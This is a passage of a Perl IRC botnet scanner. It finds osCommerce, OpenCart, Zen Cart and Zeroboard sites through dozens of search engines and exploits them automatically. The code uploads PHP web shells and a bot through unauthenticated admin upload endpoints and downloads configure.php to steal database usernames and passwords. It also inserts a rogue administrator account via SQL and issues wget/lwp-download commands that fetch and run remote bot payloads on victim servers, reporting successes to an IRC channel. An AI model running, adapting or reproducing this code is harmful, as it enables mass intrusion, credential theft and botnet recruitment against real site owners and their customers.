  1988.   my ($vuln,$chan,$site,$engine) = @_;
  1989.   if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
  1990.         my $exvln = "http://".$site.$vuln."?c=id;cd%20/tmp/;wget%20".$injurl."/pbot.txt%20-O%20pb.php;php%20pb.php";
  1991.         &msg("$chan", "$admlogo 12(4@0$engine12)(4@12VulN12)12 http://".$site.$vuln."10?c=[CMD] 12(4@0OKEE12)");
  1992.         if (get_content("http://".$site."h4rd.php") =~ /<font face='verdana' size='2'><b>ID:<\/b> 0wn3d<\/font><br>/i) {
  1993.         &info_main($dor,$chan,$engine,$rfilogo);
  1994.         }
  1995.   } exit; sleep(2); }
  1996. }
  1997. ######################## OSCO
  1998. sub oscommerce() {
  1999.         my ($chan,$bug,$dork,$engine) = @_;
  2000.     my $count = 0;
  2001.     my @list = &search_engine($chan,$bug,$dork,$engine,$oscologo);
  2002.     my $num = scalar(@list);
  2003.     if ($num > 0) {
  2004.         foreach my $site (@list) {
  2005.             $count++;
  2006.             if ($count == $num-1) { if ($conf{ssdone} == 1) { &msg("$chan","$oscologo12(4@0$engine12) 4==14F4=15I4=0N4=0I4=15S4=14H4=="); } }
  2007.                         my $bug0 = "admin/categories.php/login.php";
  2008.                         my $bug1 = "admin/file_manager.php/login.php";
  2009.             my $bug2 = "admin/banner_manager.php/login.php";
  2010.  
  2011.                         &osco_1($site,$chan,$bug0,$engine);
  2012.                         &osco_2($site,$chan,$bug1,$engine);
  2013.                         &osco_3($site,$chan,$bug2,$engine);
  2014.  
  2015.                 }
  2016.         }
  2017. }
  2018.                                
  2019. sub osco_1() {
  2020.         my ($site,$chan,$bug,$engine) = @_;
  2021.     my $test = "http://".$site.$bug;
  2022.     my $html = &get_content($test);
  2023.         if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
  2024.                 if ($html =~ /TABLE_HEADING_CATEGORIES_PRODUCTS/ ) {
  2025.                         if ($conf{soscos} == 1) { &msg("$chan","$oscologo12(4@0$engine12)(4@7SYSTEM12)11 ".$test); }
  2026.                         &osco_xpl1($test,$chan,$site,$engine);
  2027.                         &osql($chan,$site,$engine);
  2028.                 }
  2029.         } exit; sleep(2); }
  2030. }
  2031.  
  2032.  
  2033. sub osco_xpl1() {
  2034. my ($url,$chan,$site,$engine) = @_;
  2035. my $browser = LWP::UserAgent->new;
  2036. my $url    = $url."?cPath=&action=new_product_preview";
  2037. my $res = $browser->post( $url,['products_image' => ['./sh.jpg' => 'h4rd.jpg.php' => 'application/octet-stream']],'Content-Type' => 'form-data');
  2038. my $resa = $browser->post( $url,['products_image' => ['./pbot.jpg' => 'pb.jpg.php' => 'application/octet-stream']],'Content-Type' => 'form-data');
  2039. my $resb = $browser->post( $url,['products_image' => ['./sh.jpg' => '../h4rd.jpg.php' => 'application/octet-stream']],'Content-Type' => 'form-data');
  2040. my $resc = $browser->post( $url,['products_image' => ['./sh.jpg' => 'banners/h4rd.jpg.php' => 'application/octet-stream']],'Content-Type' => 'form-data');
  2041.  
  2042.         if ($res->is_success()) {
  2043.                 if ($conf{oscupl} == 1) { &msg("$chan","$oscologo12(4@0$engine12)(4@7UPLOADED12)11 ".$url); }
  2044.                 &osco_shell_check($url,$chan,$site,$engine);  
  2045.         }
  2046.         if ($resa->is_success()) {
  2047.                 &get_content("http://".$site."images/pb.jpg.php"); sleep(3); &get_content("http://".$site."pb.jpg.php");
  2048.         }
  2049.         if ($resb->is_success()) {
  2050.                 &osco_shell_check($url,$chan,$site,$engine);
  2051.         }
  2052.         if ($resc->is_success()) {
  2053.                 &osco_shell_check($url,$chan,$site,$engine);
  2054.         }
  2055. }
  2056.  
  2057. sub osco_2() {
  2058.         my ($site,$chan,$bug,$engine) = @_;
  2059.     my $test = "http://".$site.$bug;
  2060.     my $html = &get_content($test);
  2061.         if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
  2062.         if ($html =~ /TABLE_HEADING_FILENAME/) {
  2063.                         if ($conf{soscos} == 1) { &msg("$chan","$oscologo12(4@0$engine12)(4@7SYSTEM12)11 ".$test); }
  2064.                         &osco_xpl2($test,$chan,$site,$engine);
  2065.             &osql($chan,$site,$engine);
  2066.                 }
  2067.     } exit; sleep(2); }
  2068. }
  2069.  
  2070. sub osco_xpl2() {
  2071. my ($url,$chan,$site,$engine) = @_;
  2072. my $browser = LWP::UserAgent->new;
  2073. my $url    = $url."?action=processuploads";
  2074. my $res = $browser->post( $url,['file_1' => ['./sh.jpg' => 'h4rd.jpg.php' => 'application/octet-stream']],'Content-Type' => 'form-data');
  2075. my $resa = $browser->post( $url,['file_1' => ['./pbot.jpg' => 'pb.jpg.php' => 'application/octet-stream']],'Content-Type' => 'form-data');
  2076. my $resb = $browser->post( $url,['file_1' => ['./sh.jpg' => '../h4rd.jpg.php' => 'application/octet-stream']],'Content-Type' => 'form-data');
  2077. my $resc = $browser->post( $url,['file_1' => ['./sh.jpg' => 'banners/h4rd.jpg.php' => 'application/octet-stream']],'Content-Type' => 'form-data');
  2078.  
  2079.         if ($res->is_success()) {
  2080.                 if ($conf{oscupl} == 1) { &msg("$chan","$oscologo12(4@0$engine12)(4@7UPLOADED12)11 ".$url); }
  2081.                 &osco_shell_check($url,$chan,$site,$engine);
  2082.         }
  2083.         if ($resa->is_success()) {
  2084.                 &get_content("http://".$site."images/pb.jpg.php"); sleep(3); &get_content("http://".$site."pb.jpg.php");
  2085.         }
  2086.         if ($resb->is_success()) {
  2087.                 &osco_shell_check($url,$chan,$site,$engine);
  2088.         }
  2089.         if ($resc->is_success()) {
  2090.                 &osco_shell_check($url,$chan,$site,$engine);
  2091.         }
  2092. }
  2093.  
  2094. sub osco_3() {
  2095.         my ($site,$chan,$bug,$engine) = @_;
  2096.     my $test = "http://".$site.$bug;
  2097.     my $html = &get_content($test);
  2098.         if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
  2099.         if ($html =~ /TABLE_HEADING_BANNERS/) {
  2100.                         if ($conf{soscos} == 1) { &msg("$chan","$oscologo12(4@0$engine12)(4@7SYSTEM12)11 ".$test); }
  2101.                         &osco_xpl3($test,$chan,$site,$engine);
  2102.             &osql($chan,$site,$engine);
  2103.                 }
  2104.     } exit; sleep(2); }
  2105. }
  2106.  
  2107. sub osco_xpl3() {
  2108. my ($url,$chan,$site,$engine) = @_;
  2109. my $browser = LWP::UserAgent->new;
  2110. my $url    = $url."?action=insert";
  2111. my $res = $browser->post( $url,['banners_image' => ['./sh.jpg' => 'h4rd.jpg.php' => 'application/octet-stream']],'Content-Type' => 'form-data');
  2112. my $resa = $browser->post( $url,['banners_image' => ['./pbot.jpg' => 'pb.jpg.php' => 'application/octet-stream']],'Content-Type' => 'form-data');
  2113. my $resb = $browser->post( $url,['banners_image' => ['./sh.jpg' => '../h4rd.jpg.php' => 'application/octet-stream']],'Content-Type' => 'form-data');
  2114. my $resc = $browser->post( $url,['banners_image' => ['./sh.jpg' => 'banners/h4rd.jpg.php' => 'application/octet-stream']],'Content-Type' => 'form-data');
  2115.  
  2116.         if ($res->is_success()) {
  2117.                 if ($conf{oscupl} == 1) { &msg("$chan","$oscologo12(4@0$engine12)(4@7UPLOADED12)11 ".$url); }
  2118.                 &osco_shell_check($url,$chan,$site,$engine);
  2119.         }
  2120.         if ($resa->is_success()) {
  2121.                 &get_content("http://".$site."images/pb.jpg.php"); sleep(3); &get_content("http://".$site."pb.jpg.php");
  2122.         }
  2123.         if ($resb->is_success()) {
  2124.                 &osco_shell_check($url,$chan,$site,$engine);
  2125.         }
  2126.         if ($resc->is_success()) {
  2127.                 &osco_shell_check($url,$chan,$site,$engine);
  2128.         }
  2129. }
  2130.  
  2131. sub osco_shell_check() {
  2132. my ($url,$chan,$site,$engine) = @_;
  2133. $urli0 = "http://".$site."banners/h4rd.jpg.php";
  2134. $urli1 = "http://".$site."images/h4rd.jpg.php";
  2135. $urli2 = "http://".$site."h4rd.jpg.php";
  2136. my $check0 = &get_content($urli0);
  2137. my $check1 = &get_content($urli1);
  2138. my $check2 = &get_content($urli2);
  2139.  
  2140.     if ($check0 =~ /<b>ID:<\/b> 0wn3d<\/font><br>/ ) { &info_main($urli0,$chan,$engine,$oscologo); }
  2141.         if ($check1 =~ /<b>ID:<\/b> 0wn3d<\/font><br>/ ) { &info_main($urli1,$chan,$engine,$oscologo); }
  2142.         if ($check2 =~ /<b>ID:<\/b> 0wn3d<\/font><br>/ ) { &info_main($urli1,$chan,$engine,$oscologo); }
  2143.  
  2144. }
  2145.  
  2146. sub osql() {
  2147.     my ($chan,$site,$engine) = @_;
  2148.       my $test = "http://".$site."admin/file_manager.php/login.php?action=download&filename=/includes/configure.php";
  2149.       my $re   = &get_content($test);
  2150.          if ($re =~ /http:\/\//){
  2151.             &osql_xpl($test,$chan,$engine,$site);
  2152.         }
  2153.  }
  2154.  
  2155. sub osql_xpl() {
  2156.      my ($url,$chan,$engine,$site) = @_;
  2157.      my $request   = HTTP::Request->new(GET=>$url);
  2158.      my $browser   = LWP::UserAgent->new();
  2159.         $browser->timeout(17);
  2160.         my $response  = $browser->request($request);
  2161.          if ($response->is_success) {
  2162.                         my $dbinfo = "";
  2163.                         my $res   = $response->as_string;
  2164.                           if ($res =~ m/'DIR_FS_CATALOG', '(.*)'/g) {
  2165.                                 $dbinfo = $dbinfo."14[+]pth:4 $1 ";
  2166.                             $odbi[0] = "1";
  2167.                           }
  2168.                           if ($res =~ m/'DB_SERVER', '(.*)'/g) {
  2169.                           if ($1 eq "localhost") { $clr = "4 "; }
  2170.                           elsif ($1 eq "localhost:3306") { $clr = "4 "; }
  2171.                           elsif ($1 eq "127.0.0.1") { $clr = "4 "; }
  2172.                           else { $clr = "12 "; }
  2173.                                 $dbinfo = $dbinfo."14[+]srv:".$clr.$1." ";
  2174.                                 $odbi[1] = "1";
  2175.                           }
  2176.                           if ($res =~ m/'DB_SERVER_USERNAME', '(.*)'/g) {
  2177.                                 $dbinfo = $dbinfo."14[+]usr:4 $1 ";
  2178.                                 $odbi[2] = "1";
  2179.                           }
  2180.                           if ($res =~ m/'DB_SERVER_PASSWORD', '(.*)'/g) {
  2181.                                 $dbinfo = $dbinfo."14[+]pwd:4 $1 ";
  2182.                                 $odbi[3] = "1";
  2183.                           }
  2184.                           if ($res =~ m/'DB_DATABASE', '(.*)'/g) {
  2185.                                 $dbinfo = $dbinfo."14[+]db:4 $1 ";
  2186.                                 $odbi[4] = "1";
  2187.                           }
  2188.                                 if ($odbi[0] == "1" && $odbi[1] == "1" && $odbi[2] == "1" && $odbi[3] == "1" && $odbi[4] == "1") {
  2189.                                         &msg("$chan","$ossqllogo12(4@0$engine12)12(4@3VULN12)4 http://".$site." ".$dbinfo." ");
  2190.                                 }      
  2191.                  }
  2192. }
  2193.  
  2194. ######################## OpenCart
  2195. sub op() {
  2196.         my ($chan,$bug,$dork,$engine) = @_;
  2197.     my $count = 0;
  2198.     my @list = &search_engine($chan,$bug,$dork,$engine,$oplogo);
  2199.     my $num = scalar(@list);
  2200.     if ($num > 0) {
  2201.         foreach my $site (@list) {
  2202.             $count++;
  2203.             if ($count == $num-1) { if ($conf{ssdone} == 1) { &msg("$chan","$oplogo(4@5$engine15)12 Scan finish"); } }
  2204.             my $test  = "http://".$site.$open_test;
  2205.                         my $tast = "http://".$site."admin/view/javascript/fckeditor/editor/filemanager/connectors/php/connector.php";
  2206.             my $vuln = "http://".$site."admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html";
  2207.             my $re   = &get_content($test);
  2208.             if ($re =~ /$open_output/){
  2209.             &msg("$chan", "$oplogo(4@5$engine15)(4@12VulN15)13 ".$vuln."15(4@UPLOAD15)");
  2210.                         &op_xpl($tast,$chan,$site,$engine);
  2211.             }
  2212.         }
  2213.     }
  2214. }
  2215. sub op_xpl() {
  2216. my $browser = LWP::UserAgent->new;
  2217. my ($url,$chan,$site,$engine) = @_;
  2218. my $res  = $browser->post( $url."/admin/view/javascript/fckeditor/editor/filemanager/connectors/php/upload.php?Type=File",['FileUpload' => ['./sh.jpg' => 'h4rd.php' => 'application/octet-stream']],'Content-Type' => 'form-data');
  2219. my $res1  = $browser->post( $url."/admin/view/javascript/fckeditor/editor/filemanager/connectors/php/upload.php?Type=File",['FileUpload' => ['./sh.jpg' => 'h4rd.php' => 'application/octet-stream']],'Content-Type' => 'form-data');
  2220.     my $hasil = $res->as_string;
  2221.         my $hasil1 = $res1->as_string;
  2222.         my $dor = "http://".$site."admin/view/javascript/fckeditor/editor/filemanager/connectors/php/h4rd.php";
  2223.         my $dur = "http://".$site."admin/view/javascript/fckeditor/editor/filemanager/connectors/php/pb.php";
  2224.         my $check = &get_content($dor);
  2225.         &get_content($dur); sleep(1);
  2226.         if ($check =~ /<font face='verdana' size='2'><b>ID:<\/b> 0wn3d<\/font><br>/ ) { &info_main($dor,$chan,$engine,$timlogo);
  2227.         }
  2228. }
  2229.  
  2230. ######################## ZEN
  2231. sub zen() {
  2232.     my ($chan,$bug,$dork,$engine) = @_;
  2233.     my $count = 0;
  2234.     my @list = &search_engine($chan,$bug,$dork,$engine,$zenlogo);
  2235.     my $num = scalar(@list);
  2236.     if ($num > 0) {
  2237.         foreach my $site (@list) {
  2238.             $count++;
  2239.             if ($count == $num-1) { if ($conf{ssdone} == 1) { &msg("$chan","$zenlogo12(4@0$engine12)10 Scan finish"); } }
  2240.             my $test  = "http://".$site."admin/sqlpatch.php/password_forgotten.php?action=execute";
  2241.             my $html  = &get_content($test);
  2242.                if ($html =~ /zc_install/){
  2243.                    &zen_query($chan,$site,$test,$engine);
  2244.                    }
  2245.                }
  2246.           }
  2247.      }
  2248. sub zen_query() {
  2249.     my ($chan,$url,$test,$engine) = @_;
  2250.     my $code  = "INSERT INTO admin (admin_id, admin_name, admin_email, admin_pass) VALUES (773,'Ha45K','Ha45K@hotmail.com','617ec22fbb8f201c366e9848c0eb6925:87');";
  2251.     my $req = HTTP::Request->new(POST => $test);
  2252.     $req->content_type("application/x-www-form-urlencoded");
  2253.     $req->content("query_string=".$code);
  2254.     my $ua = LWP::UserAgent->new(agent => $uagent);
  2255.     $ua->timeout(3);
  2256.     my $res = $ua->request($req);
  2257.     my $data = $res->as_string;
  2258.    if ( $data =~ /1 statements processed/i ) {
  2259.    &msg("$chan","$zenlogo12(4@0$engine12)(4@9VulN15)3 http://".$url."4admin/login.php 15(4@9user15)0 Ha45K 15(4@9pass15)0 wew");
  2260.    }
  2261.    elsif ( $data =~ /Duplicate entry/ ) {
  2262.    &msg("$chan","$zenlogo12(4@0$engine12)(4@9SuCcEs15)12 http://".$url."3admin/login.php 15(4@9user15)10 Ha45K 15(4@9pass15)10 wew");
  2263.    }
  2264. }
  2265. #########################################
  2266. sub zboard() {
  2267.         my ($chan,$bug,$dork,$engine) = @_;
  2268.     my $count = 0;
  2269.     my @list = &search_engine($chan,$bug,$dork,$engine,$zerologo);
  2270.     my $num = scalar(@list);
  2271.     if ($num > 0) {
  2272.         foreach my $site (@list) {
  2273.             $count++;
  2274.                                 if ($count == $num-1) { if ($conf{ssdone} == 1) { &msg("$chan","$zerologo12(4@0$engine12)10 Scan finish"); } }
  2275.                                 my $action = "/data/shell.php?cmd=lwp-download%20".$botshell."%20h0rny.php;lwp-download%20".$injector."%20pb.php;php%20pb.php";
  2276.                                 my $test = "http://".$site.$bug."?id=test";
  2277.                                 my $chek = &get_content($test);
  2278.                                 if ($chek =~ /Zeroboard/) {
  2279.                                 my $cok = system("./zero $test 80");sleep(3);
  2280.                                 my $check2 = &get_content("http://".$site."/data/shell.php");
  2281.                                 if ($check2 =~ /Cannot execute a blank command/) {
  2282.                                 my $vuln = &get_content("http://".$site.$action);
  2283.                                 my $vulna = "http://".$site."/data/h0rny.php"; &get_content("http://".$site."/data/pb.php"); sleep(1);
  2284.                 my $vulnb = "http://".$site."/bbs/data/h0rny.php"; &get_content("http://".$site."/bbs/data/pb.php"); sleep(1);
  2285.                                 my $checka  = &get_content($vulna);sleep(1);
  2286.                                 my $checkb = &get_content($vulnb);
  2287.                                 if ($checka =~ /0wn3d/) { &info_main($vulna,$chan,$engine,$zerologo); }
  2288.                                 elsif ($checkb =~ /0wn3d/) { &info_main($vulnv,$chan,$engine,$zerologo); }
  2289.                                 }
  2290.                         }
  2291.                 }
  2292.         }
  2293. }
  2294.  
  2295. #########################################
  2296. sub search_engine() {
  2297.     my (@total,@clean);
  2298.         my ($chan,$bug,$dork,$engine,$logo) = @_;
  2299.     if ($engine eq "Google") { my @google = &google($dork); push(@total,@google); }
  2300.     if ($engine eq "Google2") { my @google2 = &google2($dork); push(@total,@google2); }
  2301.         if ($engine eq "GigaBlast") { my @gigablast = &gigablast($dork); push(@total,@gigablast); }
  2302.         if ($engine eq "EuroSeek") { my @euroseek = &euroseek($dork); push(@total,@euroseek); }
  2303.         if ($engine eq "Alltheweb") { my @alltheweb = &alltheweb($dork); push(@total,@alltheweb); }
  2304.     if ($engine eq "Rediff") { my @rediff = &rediff($dork); push(@total,@rediff); }
  2305.         if ($engine eq "Mamma") { my @mamma = &mamma($dork); push(@total,@mamma); }
  2306.     if ($engine eq "Bing") { my @bing = &bing($dork); push(@total,@bing); }
  2307.     if ($engine eq "Altavista") { my @altavista = &altavista($dork); push(@total,@altavista); }
  2308.     if ($engine eq "Yahoo") { my @yahoo = &yahoo($dork); push(@total,@yahoo); }
  2309.         if ($engine eq "Yahoo2") { my @yahoo2 = &yahoo2($dork); push(@total,@yahoo2); }
  2310.     if ($engine eq "Ask") { my @ask = &ask($dork); push(@total,@ask); }
  2311.     if ($engine eq "Uol") { my @uol = &uol($dork); push(@total,@uol); }
  2312.     if ($engine eq "Clusty") { my @clusty = &clusty($dork); push(@total,@clusty); }
  2313.     if ($engine eq "Gutser") { my @gutser = &gutser($dork); push(@total,@gutser); }
  2314.     if ($engine eq "Exalead") { my @exalead = &exalead($dork); push(@total,@exalead); }
  2315.     if ($engine eq "Lycos") { my @lycos = &lycos($dork); push(@total,@lycos); }
  2316.     if ($engine eq "Virgilio") { my @virgilio = &virgilio($dork); push(@total,@virgilio); }
  2317.     if ($engine eq "Webde") { my @webde = &webde($dork); push(@total,@webde); }
  2318.     if ($engine eq "Hotbot") { my @hotbot = &hotbot($dork); push(@total,@hotbot); }
  2319.     if ($engine eq "Aol") { my @aol = &aol($dork); push(@total,@aol); }
  2320.     if ($engine eq "Sapo") { my @sapo = &sapo($dork); push(@total,@sapo); }
  2321.     if ($engine eq "Duck") { my @duck = &duck($dork); push(@total,@duck); }
  2322.     if ($engine eq "Yause") { my @yause = &yause($dork); push(@total,@yause); }
  2323.     if ($engine eq "Baidu") { my @baidu = &baidu($dork); push(@total,@baidu); }
  2324.     if ($engine eq "Black") { my @black = &black($dork); push(@total,@black); }
  2325.     if ($engine eq "Onet") { my @onet = &onet($dork); push(@total,@onet); }
  2326.     if ($engine eq "Sizuka") { my @sizuka = &sizuka($dork); push(@total,@sizuka); }
  2327.     if ($engine eq "Walla") { my @walla = &walla($dork); push(@total,@walla); }
  2328.     if ($engine eq "Demos") { my @demos = &demos($dork); push(@total,@demos); }
  2329.     if ($engine eq "Rose") { my @rose = &rose($dork); push(@total,@rose); }
  2330.     if ($engine eq "Seznam") { my @seznam = &seznam($dork); push(@total,@seznam); }
  2331.     if ($engine eq "Tiscali") { my @tiscali = &tiscali($dork); push(@total,@tiscali); }
  2332.     if ($engine eq "Naver") { my @naver = &naver($dork); push(@total,@naver); }
  2333.         if ($engine eq "AmiDalLa") { my @amidalla = &amidalla($dork); push(@total,@amidalla); }
  2334.         if ($engine eq "BusCaR") { my @buscar = &buscar($dork); push(@total,@buscar); }
  2335.         if ($engine eq "KvaSiR") { my @kvasir = &kvasir($dork); push(@total,@kvasir); }
  2336.         if ($engine eq "eXciTe") { my @excite = &excite($dork); push(@total,@excite); }
  2337.         if ($engine eq "InteRia") { my @interia = &interia($dork); push(@total,@interia); }
  2338.         if ($engine eq "SnZ") { my @snz = &snz($dork); push(@total,@snz); }
  2339.         if ($engine eq "RambLer") { my @rambler = &rambler($dork); push(@total,@rambler); }
  2340.         if ($engine eq "YaNdeX") { my @yandex = &yandex($dork); push(@total,@yandex); }
  2341.         if ($engine eq "DooGatE") { my @doogate = &doogate($dork); push(@total,@doogate); }
  2342.         if ($engine eq "sogou") { my @sogou = &sogou($dork); push(@total,@sogou); }
  2343.         if ($engine eq "joeant") { my @joeant = &joeant($dork); push(@total,@joeant); }
  2344.         if ($engine eq "terra") { my @terra = &terra($dork); push(@total,@terra); }
  2345.         if ($engine eq "youdao") { my @youdao = &youdao($dork); push(@total,@youdao); }
  2346.         if ($engine eq "amfibi") { my @amfibi = &amfibi($dork); push(@total,@amfibi); }
  2347.         if ($engine eq "bigclique") { my @bigclique = &bigclique($dork); push(@total,@bigclique); }
  2348.         if ($engine eq "dancefloor") { my @dancefloor = &dancefloor($dork); push(@total,@dancefloor); }
  2349.         if ($engine eq "rakuten") { my @rakuten = &rakuten($dork); push(@total,@rakuten); }
  2350.         if ($engine eq "nova") { my @nova = &nova($dork); push(@total,@nova); }
  2351.         if ($engine eq "nadji") { my @nadji = &nadji($dork); push(@total,@nadji); }
  2352.         if ($engine eq "goo") { my @goo = &goo($dork); push(@total,@goo); }
  2353.         if ($engine eq "uksubmit") { my @uksubmit = &uksubmit($dork); push(@total,@uksubmit); }
  2354.         ###### nieuwe ######                   
  2355.         if ($engine eq "NetSprint") { my @netsprint = &netsprint($dork); push(@total,@netsprint); }
  2356.         if ($engine eq "sAol") { my @saol = &saol($dork); push(@total,@saol); }
  2357.     if ($engine eq "Lookle") { my @lookle = &lookle($dork); push(@total,@lookle); }
  2358.     if ($engine eq "optusZoo") { my @optuszoo = &optuszoo($dork); push(@total,@optuszoo); }
  2359.         if ($engine eq "Search66") { my @search66 = &search66($dork); push(@total,@search66); }
  2360.         if ($engine eq "Arrama") { my @arrama = &arrama($dork); push(@total,@arrama); }
  2361.         if ($engine eq "eXciteJP") { my @excitejp = &excitejp($dork); push(@total,@excitejp); }
  2362.     if ($engine eq "BigLobe") { my @biglobe = &biglobe($dork); push(@total,@biglobe); }
  2363.         if ($engine eq "Clix") { my @clix = &clix($dork); push(@total,@clix); }
  2364.         if ($engine eq "SearchCH") { my @searchch = &searchch($dork); push(@total,@searchch); }
  2365.         if ($engine eq "Cada") { my @cada = &cada($dork); push(@total,@cada); }
  2366.         ####################
  2367.         @clean = &clean(@total);
  2368.         if ($conf{ssfind} == 1) {
  2369.                 &msg("$chan","$logo12(4@0$engine12)8 ".scalar(@total)." 14-14«15¤14»14-13 ".scalar(@clean)." ");
  2370.         }
  2371.         return @clean;
  2372. }
  2373.  
  2374. #########################################
  2375.  
  2376. sub isFound() {
  2377.     my $status = 0;
  2378.     my $link = $_[0];
  2379.     my $reqexp = $_[1];
  2380.     my $res = &get_content($link);
  2381.     if ($res =~ /$reqexp/) { $status = 1 }
  2382.     return $status;
  2383. }
  2384.  
  2385. sub timFound() {
  2386.         my $status = 0;
  2387.         my $url    = $_[0];
  2388.         my $reqexp = $_[1];
  2389.         my $site   = $url."sh.php";
  2390.         my $request   = HTTP::Request->new(GET=>$url);
  2391.         my $browser   = LWP::UserAgent->new();
  2392.                 $browser->timeout(12);
  2393.                 my $response  = $browser->request($request);
  2394.                 if ($response->is_success) {
  2395.                 my $res   = $response->as_string;
  2396.                 if ($res =~ m/$reqexp/g ) { $status = 1 }
  2397.                 }
  2398. return $status;
  2399. }
  2400.  
  2401. sub get_content() {
  2402.     my $url = $_[0];
  2403.     my $ua = LWP::UserAgent->new(agent => $uagent);
  2404.     $ua->timeout(12);
  2405.     my $req = HTTP::Request->new(GET => $url);
  2406.     my $res = $ua->request($req);
  2407.     return $res->content;
  2408. }
  2409.  
  2410. #sub post_content() {
  2411. #    my $url = $_[0];
  2412. #       my ($host,$bug) = split('\?', $url);
  2413. #    my $req = HTTP::Request->new(POST => $host);
  2414. #    $req->content($bug);
  2415. #    my $ua = LWP::UserAgent->new(agent => $uagent);
  2416. #    $ua->timeout(10);
  2417. #    my $res = $ua->request($req);
  2418. #    return $res->content;
  2419. #}
  2420.  
  2421.  
  2422. sub post_content() {
  2423. my $url = $_[0];
  2424. my ($host,$bug) = split('\?', $url);
  2425.        
  2426.   $ua = LWP::UserAgent->new(agent => $uagent);
  2427.   $req = HTTP::Request->new(POST => $host);
  2428.   $req->content_type('application/x-www-form-urlencoded');
  2429.   $req->content($bug);
  2430.   $res = $ua->request($req);
  2431.   if ($res->is_success) {
  2432.     return $res->content;
  2433.   }
  2434. }
  2435.  
  2436. ######################################### SEARCH ENGINE
  2437. sub google() {
  2438.     my @list;
  2439.     my $key = $_[0];
  2440.     for (my $i=1; $i<=1000; $i+=100){
  2441.         my $search = ("http://www.google.com/search?q=".&key($key)."&num=100&filter=0&start=".$i);
  2442.         my $res = &search_engine_query($search);
  2443.         while ($res =~ m/http:\/\/([^>\"]*)\//g) {
  2444.             my $link = $1; if ($link!~ /google/){ $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep); }
  2445.         }
  2446.     }
  2447. return @list;
  2448. }
  2449. ############### GOED
  2450. sub google2() {
  2451.   my @list;
  2452.   my $key = $_[0];
  2453.   my @doms = ("com","ad","ae","com.af","com.ag","com.ai","am","co.ao","com.ar","as","at","com.au","az","ba","com.bd","be","bf","bg","com.bh","bi","bj","com.bn","com.bo","com.br","bs","co.bw","by","com.bz","ca","cd","cf","cg","ch","ci","co.ck","cl","cm","cn","com.co","co.cr","com.cu","cv","cz","de","dj","dk","dm","com.do","dz","com.ec","ee","com.eg","es","com.et","fi","com.fj","fm","fr","ga","ge","gg","com.gh","com.gi","gl","gm","gp","gr","com.gt","gy","com.hk","hn","hr","ht","hu","co.id","ie","co.il","im","co.in","iq","is","it","je","com.jm","jo","co.jp","co.ke","com.kh","ki","kg","co.kr","com.kw","kz","la","com.lb","li","lk","co.ls","lt","lu","lv","com.ly","co.ma","md","me","mg","mk","ml","mn","ms","com.mt","mu","mv","mw","com.mx","com.my","co.mz","com.na","com.nf","com.ng","com.ni","ne","nl","no","com.np","nr","nu","co.nz","com.om","com.pa","com.pe","com.ph","com.pk","pl","pn","com.pr","ps","pt","com.py","com.qa","ro","ru","rw","com.sa","com.sb","sc","se","com.sg","sh","si","sk","com.sl","sn","so","sm","st","com.sv","td","tg","co.th","com.tj","tk","tl","tm","tn","to","com.tr","tt","com.tw","co.tz","com.ua","co.ug","co.uk","com.uy","co.uz","com.vc","co.ve","vg","co.vi","com.vn","vu","ws","rs","co.za","co.zm","co.zw","cat");
  2454.   my $dom = $doms[rand(scalar(@doms))];
  2455.     for (my $i=1; $i<=1000; $i+=100) {
  2456.         my $search = ("http://www.google.".$domain."/search?num=50&q=".&key($key)."&start=".$b."&sa=N");
  2457.         my $res = &search_engine_query($search);
  2458.         while ($res =~ m/http:\/\/([^>\"]*)\//g) {
  2459.             my $link = $1; if ($link!~ /google/){ $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep); }
  2460.         }
  2461.     }
  2462. return @list;
  2463. }
  2464. #### GOED
  2465. sub gigablast(){
  2466.     my @list;
  2467.         my $key = $_[0];
  2468.         for ($b=1; $b<=1000; $b+=100) {
  2469.         my $search = ("http://www.gigablast.com/search?q=".&key($key)."&n=".$b."");
  2470.         my $res = &search_engine_query($search);
  2471.         while ($res =~ m/http:\/\/(.+?)\//g) {
  2472.             my $link = $1; if ($link!~ /gigablast/){ $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep); }
  2473.                 }
  2474.     }
  2475. return @list;
  2476. }
  2477. #### ?
  2478. sub euroseek() {
  2479.         my @list;
  2480.         my $key = $_[0];
  2481.         for ($b=1; $b<=1000; $b+=100) {
  2482.                 my $search = "http://euroseek.com/system/search.cgi?mode=internet&start=".$b."&string=".&key($key)."";
  2483.                 my $link = &search_engine_query($search);
  2484.                 while ( $link =~ m/http:\/\/(.+?)\//g) {
  2485.                         my $link = $1; if ($link!~ /euroseek/){ $link =~ s/<//g; $link =~ s/ //g; my @grep = links($link); push(@list,@grep); }
  2486.                 }
  2487.         }
  2488. return @list;
  2489. }
  2490. #### -
  2491. sub alltheweb() {
  2492.   my @list;
  2493.   my $key = $_[0];
  2494.     for ($i = 0;$i <= 1000;$i += 100) {
  2495.         my $search = ("http://www.alltheweb.com/search?cat=web&_sb_lang=any&hits=500&q=".key($key)."&o=".$i."");
  2496.         my $res = &search_engine_query($search);
  2497.                 while ($res =~ m/http:\/\/(.+?)\//g) {
  2498.             my $link = $1; if ($link!~ /alltheweb/){ $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep); }
  2499.                 }
  2500.      }
  2501. return @list;
  2502. }
  2503. ############### GOED
  2504. sub rediff() {
  2505.     my @list;
  2506.     my $key = $_[0];
  2507.     for (my $i=0; $i<=1000; $i+=100) {
  2508.         my $search = ("http://search1.rediff.com/dirsrch/default.asp?MT=".&key($key)."&iss=&submit=Search&firstres=".$i);
  2509.         my $res = &search_engine_query($search);
  2510.         while ($res =~ m/http:\/\/(.+?)\//g) {
  2511.             my $link = $1; if ($link!~ /rediff\.com/){ $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep); }
  2512.         }
  2513.     }
  2514. return @list;
  2515. }
  2516. ############### GOED
  2517. sub mamma(){
  2518.         my @list;
  2519.         my $key = $_[0];
  2520.         for($b=0;$b<=1000;$b+=100){
  2521.                 my $Th=("http://www.mamma.com/result.php?q=".key($key)."&type=web&p=".$b);
  2522.                 my $Res=&search_engine_query($Th);
  2523.                 while($Res =~ m/target=\"_blank\">(.+?)\//g){
